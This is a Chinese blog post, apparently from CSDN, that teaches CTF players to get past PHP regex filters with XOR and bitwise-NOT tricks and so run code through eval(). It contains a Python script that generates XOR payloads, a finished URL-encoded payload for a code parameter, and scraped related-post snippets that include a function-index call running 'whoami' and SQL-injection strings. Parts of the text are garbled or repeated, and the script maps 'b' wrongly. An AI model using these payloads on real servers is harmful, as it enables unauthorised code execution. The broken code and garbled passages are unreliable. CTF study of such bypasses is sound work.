php正则取反绕过和异或绕过

于 2025-05-18 17:24:53 发布
阅读量821 收藏 23
点赞数 25
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lubai60060/article/details/148046814
版权

取反绕过和异或绕过php正则表达式

基础知识

PHP5和PHP7的区别

  • PHP5中,assert()是一个函数,我们可以用 = a s s e r t ; _=assert; =assert;_()这样的形式来执行代码。但在PHP7中,assert()变成了一个和eval()一样的语言结构,不再支持上面那种调用方法。(不过貌似这点存疑,我在PHP7.1中确实不允许再使用这种调用方法了,但是网上有人貌似在PHP7.0.12下还能这样调用,可能是7.1及以上不行??)
  • PHP5中,是不支持($a)()这种调用方法的,但在PHP7中支持这种调用方法,因此支持这么写(‘phpinfo’)();

PHP中的短标签

PHP中有两种短标签,<??>和<?=?>。
其中,<??>相当于对<?php>的替换。
而<?=?>则是相当于<? echo>。例如:<?= '111'?>

将会输出’111’ 大部分文章说短标签需要在php.ini中设置short_open_tag为on才能开启短标签(默认是开启的,但似乎又默认注释,所以还是等于没开启)。但实际上在PHP5.4以后,无论short_open_tag是否开启,<?=?>这种写法总是适用的,<??>这种写法则需要short_open_tag开启才行。

异或绕过

引入

在CTF的一些RCE题目中,可能会对传入的参数进行过滤,当题目过滤了字母和数字甚至其他一些符号时,可以尝试使用异或绕过的方式尝试去绕过。

何为异或

异或(XOR,Exclusive OR)是一种逻辑运算,用于对两个二进制位进行比较。其规则如下:

  • 当两个输入位相同时,输出为 0(假);
  • 当两个输入位不同时,输出为 1(真)。

在计算机中,字母和数字都是用 ASCII(或 Unicode)编码存储的,而 异或(XOR)是按位运算,所以当两个字符的二进制表示进行异或时,可能会得到一个新的有效 ASCII 字符

使用条件

当题目过滤了字母和数字的同时,没有过滤掉下划线“_”,就可以使用。

请添加图片描述

这是因为当我们构造好payload后,直接把payload赋值给参数是不行的,需要先把payload赋值给一个变量,再将这个变量的值赋给参数才行,又因为题目过滤了字母和数字,所以只能使用变量“$_”,当下划线也被过滤的时,变量将无名可取,即没有变量可用,也无法进行异或构造payload绕过。

实战步骤

根据题目中的提示,已知我们要执行eval(getflag()),且题目中过滤了字母和数字,但是没有过滤下划线,所以我们可以利用异或绕过
请添加图片描述

1.使用脚本

这个示例脚本的作用就是将我们输入的一个字母字符串中每个字母字符,是通过哪两个特殊字符异或生成的过程,输出出来。

word = input("Input word:")
payload = """"""
for i in word:
    if i == "a":
        payload += '("!"^"@").'
    elif i == "b":
        payload += '("!"^"@").'
    elif i == "c":
        payload += '("#"^"@").'
    elif i == "d":
        payload += '("$"^"@").'
    elif i == "e":
        payload += '("%"^"@").'
    elif i == "f":
        payload += '("&"^"@").'
    elif i == "g":
        payload += '("\'"^"@").'
    elif i == "h":
        payload += '("("^"@").'
    elif i == "i":
        payload += '(")"^"@").'
    elif i == "j":
        payload += '("*"^"@").'
    elif i == "k":
        payload += '("+"^"@").'
    elif i == "l":
        payload += '(","^"@").'
    elif i == "m":
        payload += '("-"^"@").'
    elif i == "n":
        payload += '("."^"@").'
    elif i == "o":
        payload += '("/"^"@").'
    elif i == "p":
        payload += '("/"^"_").'
    elif i == "q":
        payload += '("/"^"^").'
    elif i == "r":
        payload += '("."^"\\").'
    elif i == "s":
        payload += '("-"^"^").'
    elif i == "t":
        payload += '("/"^"[").'
    elif i == "u":
        payload += '("("^"]").'
    elif i == "v":
        payload += '("("^"^").'
    elif i == "w":
        payload += '("("^"_").'
    elif i == "x":
        payload += '("&"^"^").'
    elif i == "y":
        payload += '''("'"^"^").'''
    elif i == "z":
        payload += '("&"^"\\").'
    elif i == "A":
        payload += '("!"^"`").'
    elif i == "B":
        payload += '("<"^"~").'
    elif i == "C":
        payload += '("#"^"`").'
    elif i == "D":
        payload += '("$"^"`").'
    elif i == "E":
        payload += '("%"^"`").'
    elif i == "F":
        payload += '("&"^"`").'
    elif i == "G":
        payload += '(":"^"}").'
    elif i == "H":
        payload += '("("^"`").'
    elif i == "I":
        payload += '(")"^"`").'
    elif i == "J":
        payload += '("*"^"`").'
    elif i == "K":
        payload += '("+"^"`").'
    elif i == "L":
        payload += '(","^"`").'
    elif i == "M":
        payload += '("-"^"`").'
    elif i == "N":
        payload += '("."^"`").'
    elif i == "O":
        payload += '("/"^"`").'
    elif i == "P":
        payload += '("@"^"~").'
    elif i == "Q":
        payload += '("-"^"|").'
    elif i == "R":
        payload += '("."^"|").'
    elif i == "S":
        payload += '("("^"{").'
    elif i == "T":
        payload += '("("^"|").'
    elif i == "U":
        payload += '("("^"}").'
    elif i == "V":
        payload += '("("^"~").'
    elif i == "W":
        payload += '(")"^"~").'
    elif i == "X":
        payload += '("#"^"{").'
    elif i == "Y":
        payload += '("$"^"{").'
    elif i == "Z":
        payload += '("$"^"~").'
    else:
        payload += i
print("payload:\n"+payload)

输入
	getflag()
得到
	("'"^"@").("%"^"@").("/"^"[").("&"^"@").(","^"@").("!"^"@").("'"^"@").()
2.将payload进行url编码

​ 因为有些字符在浏览器中不会被手动编码,所以这里我们必须进行手动编码。

3.将payload赋值给一个变量

​ 因为如果直接将编码后的payload赋值给参数是无法执行的

​ 要先将编码后的payload赋值给一个变量,再将这个变量的值赋给这个参数才行

code = 一个变量 =payload(url编码后);变量名();
这里?code=$_=(%22'%22%5E%22%40%22).(%22%25%22%5E%22%40%22).(%22%2F%22%5E%22%5B%22).(%22%26%22%5E%22%40%22).(%22%2C%22%5E%22%40%22).(%22!%22%5E%22%40%22).(%22'%22%5E%22%40%22).();$_();

总结

​ 当字母和数字被过滤,但是下划线没有被过滤的时候,我们就可以考虑使用异或绕过正则表达式的匹配。

取反绕过

引入

在由于对传入参数值的长度有限制或过滤了下划线等原因无法利用异或绕过时,可以尝试使用取反绕过。

何为取反

  • 取反运算(~) 会对每个比特位进行翻转(0110)。
  • 在PHP中,~"字符串" 会返回该字符串的取反形式。
  • 可以用于构造被过滤的关键字。

使用条件

波浪号~没有被过滤掉,因为取反绕过是通过使用“字符串”的形式返回到新的字符串,当被禁用时,也自然无法进行取反了。

参考文章

PHP正则表达式绕过姿势之异或绕过

)。

  • 在PHP中,~"字符串" 会返回该字符串的取反形式。
  • 可以用于构造被过滤的关键字。

使用条件

波浪号~没有被过滤掉,因为取反绕过是通过使用“字符串”的形式返回到新的字符串,当被禁用时,也自然无法进行取反了。

参考文章

PHP正则表达式绕过姿势之异或绕过

无字母数字webshell总结

lubai600000
关注
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 3154
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
绕过preg_match
代码审计
03-21 3079
绕过preg_match <?php $input = $_GET['input']; if (preg_match("/[a-zA-Z]/", $input)) { exit("wrong"); } eval($input); 可以简单的理解preg_match("/[a-zA-Z]/" 正则表达式匹配 大小写字母符号 最终的目的是要到eval()函数中去执行任意代码,这题也就是考研我们如何绕过这个preg_match。 简单来说将特殊字符通过异或的方式重组了phpinfo(); 什么是按
php rce绕过
m0_73973498的博客
10-08 3719
php?>是正常情况下的标签,用于识别这是个php文件,但php也允许使用短标签等价于
PHP标签、双写绕过
2401_82985722的博客
03-19 407
文件中包含了PHP代码,但是在上下文中不被允许。(后端利用正则限制匹配PHPphp)上传的文件类型不是有效的 JPEG 图片格式。短标签会直接把php的结果输出,原来的路径中存在php。用pphpph双写绕过。·这都不做(web)(此题免杀马不可用)连接蚁剑,得flag。
PHP 代码执行漏洞:详细解析与绕过方法
最新发布
智商不在服务区的博客
03-26 958
Web 安全中,PHP 代码执行漏洞是一类非常严重的安全隐患。攻击者利用这些漏洞不仅可以执行任意代码,还能进一步窃取敏感数据、植入后门,甚至控制整台服务器。尤其是在 CTF(Capture The Flag)比赛中,利用代码执行漏洞获取“flag”是常见的题目类型。通过以上示例可以看出,当过滤规则不够全面或过于依赖关键字屏蔽时,攻击者仍然可以利用字符拆分、特殊空白、数据流协议、以及内置变量等技巧绕过防护,实现代码执行或文件读取。避免动态执行用户输入:永远不要直接使用eval()
文件上传漏洞(漏洞产生因素、前端验证绕过php标签绕过)
ShenZ的博客
08-07 1402
文件上传漏洞 copy xx.png/b+xx.txt xx.png 在嵌入了php脚本的html中,使用 phtml作为后缀名 php,php3,php4,php5,phtml.pht 上传漏洞相关因素 1.可解析的后缀, 也就是该语言有多个可解析的后缀,比如php语言可解析的后缀为php,php2,php3等等 2.大小写混合, 如果系统过滤不严,可能大小写可以绕过。 3.中间件, 每款中间件基本都解析漏洞,比如iis就可以把xxx.asp;.jpg当asp来执行。 4.系统特性, 特别是Window
php绕过html标签,php特殊字符过滤,html标签处理
weixin_39802814的博客
06-22 771
1,magic_quotes_gpc默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。其实这...
PHP代码层防护与绕过
10-24 468
0x01 前言   在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。   这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。   Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。 0x02 关键字过滤 ...
无字母数字绕过正则表达式--上传临时文件、异或、或、取反、自增
unexpectedthing的博客
09-10 1194
文章目录 借用羽神的文章,转发是为了自己后面方便看 https://blog.csdn.net/miuzzx/article/details/108569080?spm=1001.2014.3001.5501
CTF—PHP 弱类型&异或取反&序列化&RCE
qi_SJQ_的博客
03-01 1160
PHP考点很多,思维导图只能包括大部分的考点,未必全,网上相关总结文章也很多,比如: CTF php总结(一)、CTF php总结(二)、CTF php总结(三)总结了比较常见的基础php题型。 虽然ctf web题原来以php为主,后来加入了python,现在又比较流行java,总体来说php仍然还是比较重要的。 随便几个知识选讲(而且很多知识也是综合考察): 1.php强弱类型比较: “==”是弱类型比较,只比较数值;“= = =”是强类型比较,会比较数值以及变量类型。最简单的是字符串与数字比较,不过.
渗透测试——sql手工注入实战 @apache+php+Mysql 正则注入
aming小老弟
07-05 97
0x01 Mysql 手工注入 1.1 联合注入 登录后复制 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from informat...
某校园内网渗透测试
qq_28624871的博客
05-10 3961
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合gobynmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 7927
一、关于md5()sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
渗透测试 | phpwebshell绕过方法汇总
zkaqlaoniao的博客
12-26 564
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
常见php函数绕过
huangyongkang666的博客
03-31 4535
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
[红明谷CTF 2021]write_shell php标签绕过
scrawman的博客
11-28 3851
[红明谷CTF 2021]write_shell 考的是php里的绕过,因为正则过滤了php ; ~ eval等字符,所以php标签<?php?>写入不了 https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的 对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php
ZTJL1
qq_75005708的博客
10-05 281
查看PHP回到页面访问php,访问结果如下前面还比较好理解给出用户名密码,但是后面就出现一个函数,我们应该要绕过它,接着往下看一下,它需要admin=admin,然后就passwd=wllm,如果可以满足这个条件,就可以拿到flag了,现在关键的问题就是我们要绕过函数。__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行程序调用反序列化方法时,会自动执行__weakup()函数payloads:4:"wllm";
PHP任意文件包含绕过截断新姿势
weixin_33859844的博客
03-18 420
前言 此方法是@l3m0n叔叔给我分享的,原文已经发布在90sec 我没有90sec的账号,所以自己实践一下,顺道安利给访问我博客的小伙伴。 适用情况 可以控制协议的情况下,如果%00无法截断包含,可使用这招。 &lt;?php $a = $_GET['file']; include $a.'.html.php'; 思路&amp;方法 思路主要是利用了PHP的一个...
正则绕过+eval函数
03-10
### 正则表达式绕过 `eval` 函数安全限制的方法 在某些情况下,开发者可能会尝试使用正则表达式来过滤掉潜在危险的输入以防止恶意代码被执行。然而,在实际应用中这些措施可能并不完全有效。 对于给定的例子[^2]: ```php <?php error_reporting(0); highlight_file(__FILE__); $code = $_GET['code']; if (preg_match('/[a-z0-9]/i', $code)) { die('hacker'); } eval($code); ``` 此段代码试图阻止包含字母或数字的字符串作为 `$code` 参数传递进来并执行。为了绕过这种简单的正则检测,攻击者可以利用非字母数字字符构建有效的 PHP 语法结构来进行攻击。例如,通过使用特殊字符组合或者内置常量实现功能调用而不违反现有的正则条件。 一种具体的绕过方式涉及到使用 PHP 中预定义好的魔术常数以及数组索引来访问特定函数名。考虑到另一个例子中的技巧[^4]: ```php <?php highlight_file(__FILE__); $cmd = $_POST['cmd']; if (isset($cmd)){ if (preg_match('/eval|system|exec|passthru|[\"\' ]/i', $cmd)){ die('No Hack!'); } else{ eval($cmd); } }else{ echo 'Welcome!'; } ``` 这里展示了如何通过获取内部已加载函数列表并通过下标选取目标函数的方式来规避关键字黑名单检查。具体来说,可以通过如下请求参数达到目的: ```bash cmd=get_defined_functions()[internal][373]("whoami"); ``` 这实际上是在调用 `system()` 函数而未直接提及它的名称。值得注意的是,这种方法依赖于服务器端环境的具体配置版本差异,因此不一定总是可行。 另外还有一种基于异或操作符 (`^`) 的技术可用于构造看似无害但实际上具有破坏性的 payload 。由于任何字符与 `\xFF` 进行按位异或运算将会得到其自身的补码表示形式,所以如果能够巧妙地设计输入,则可以在不触发敏感模式匹配的情况下完成预期行为[^5]。 尽管上述方法确实存在理论上的可行性,但在真实世界的应用开发过程中应当极力避免任何形式的动态代码评估机制(如 `eval()`),转而采用更安全可靠的替代方案来处理业务逻辑需求。 #### 示例 Payload 构造 假设有一个非常严格的正则规则只允许部分符号的存在,那么下面是一个可能用来绕过的实例: ```php ${_GET}[key]() // 利用了PHP解析器特性使得 _GET[key]() 被解释成 $_GET['key']() ``` 这里的 `${}` 结构让 PHP 解析引擎将其视为一个整体变量而非独立组件,从而成功避开了对非法字符的筛查过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值